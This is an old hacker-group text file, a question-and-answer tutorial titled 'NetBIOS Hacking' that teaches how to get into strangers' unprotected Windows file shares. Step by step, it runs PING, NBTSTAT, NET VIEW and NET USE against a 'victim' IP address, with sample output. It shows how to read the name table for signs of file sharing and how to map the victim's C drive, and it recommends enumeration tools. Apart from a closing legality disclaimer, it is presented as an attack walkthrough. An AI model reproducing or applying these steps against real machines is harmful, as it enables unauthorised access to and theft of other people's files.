|-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_||| |||_.-+=~^``^~=+-._.-+=~^``^~=+-._.-+=~^``^~=+-._.-+=~^``^~=+-._.-+=~^``^~=+-._||| ||| ||| ||| ||| ||| -=[ # C C P O W E R ]=- (at mIRC DALnet) ||| ||| www.CCpower.net ||| ||| ||| ||| Made By: GSD ||| |||_.-+=~^``^~=+-._.-+=~^``^~=+-._.-+=~^``^~=+-._.-+=~^``^~=+-._.-+=~^``^~=+-._||| |-_-_-_-_-_-_-_--_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-||| NetBIOS Hacking Q: What is NetBIOS? A: NetBIOS stands for "Network Basic Input Output System" and is a way for computers in a network (LAN or WAN) to share files and printers.(many other uses aswell, but beyond the scope) Q: How is this interesting to me? A: As you now know, it is used to share files. This can be exploited. Many people share their entire hard-drive without even knowing it. Most of the time, theese "shares" will not be password protected. Q: Can i accsess these files from my own computer you mean? A: Sure. That is what this tutorial is all about. Q: How? A: If you have Windows installed, you allready got all the tools you need to access remote shares. Q: Can you show me? A: Sure. ================================================================ C:\windows> <---this is what your terminal looks like when you initiate the attack. I could start talking about finding IP's too, but that would be off topic, so you are going to have to read another tutorial on that if you dont know it. lets just say the victim's ip is 123.123.123.123 Now... lets make sure the host is there. C:\windows>PING 123.123.123.123 what you want to see then is: Reply from 123.123.123.123: byte=32 time<1ms TTL=128 WE NOW KNOW TARGET IS ONLINE. ----------------------------------------------------------------- Next step is to see if target is sharing anything: C:\windows>NBTSTAT -a 123.123.123.123 Name Type Status --------------------------------------------- L337 <00> UNIQUE Registered NSDAP <00> GROUP Registered L337 <03> UNIQUE Registered L337 <20> UNIQUE Registered NSDAP <1E> GROUP Registered STEALTHWASP <03> UNIQUE Registered NSDAP <1D> UNIQUE Registered What does this tell us? L337 is the computername. NSDAP is the name of the workgroup. STEALTHWASP is the currently logged in user. BUT there is some even more valuable information there. Do you see the <20> on the 4th line? That means the victim has filesharing enabled. If there was no <20> there, we could just forget doing the NetBIOS exploit on this target. ----------------------------------------------------------------- Next step is to see the shares, if any. This may still be a dead end. C:\windows>NET VIEW \\123.123.123.123 Shared resources on 123.123.123.123 Share name Type Comment -------------------------------------------- C Disk D Disk Command completed successfully. NOW WE KNOW THE SHARE-NAMES. ----------------------------------------------------------------- All that remains now is to "MAP" a share... ----------------------------------------------------------------- C:\windows>NET USE K: \\123.123.123.123\C Command completed successfully. CHANGE TO K: IN DOS OR OPEN WINDOWS EXPLORER, AND YOURE IN... ================================================================ Commands used in this tutorial: PING NBTSTAT -a IP (123.123.123.123) NET VIEW \\IP NET USE K: \\IP\SHARENAME Programms worth taking a look at: NbtScan, Enum, Legion and PQwak. Theese can all easily be found at www.google.com ***THIS IS ILLEGAL TO DO IF YOU DO NOT HAVE PERMITTION FROM THE OWNER OF THE REMOTE SYSTEM.*** ***THIS IS FOR INFORMATIONAL PURPOSE ONLY. STAY LEGAL.*** ------------------------------------------------------------------------------------------- ( By: StealthWasp ) -------------------------------------------------------------------------------------------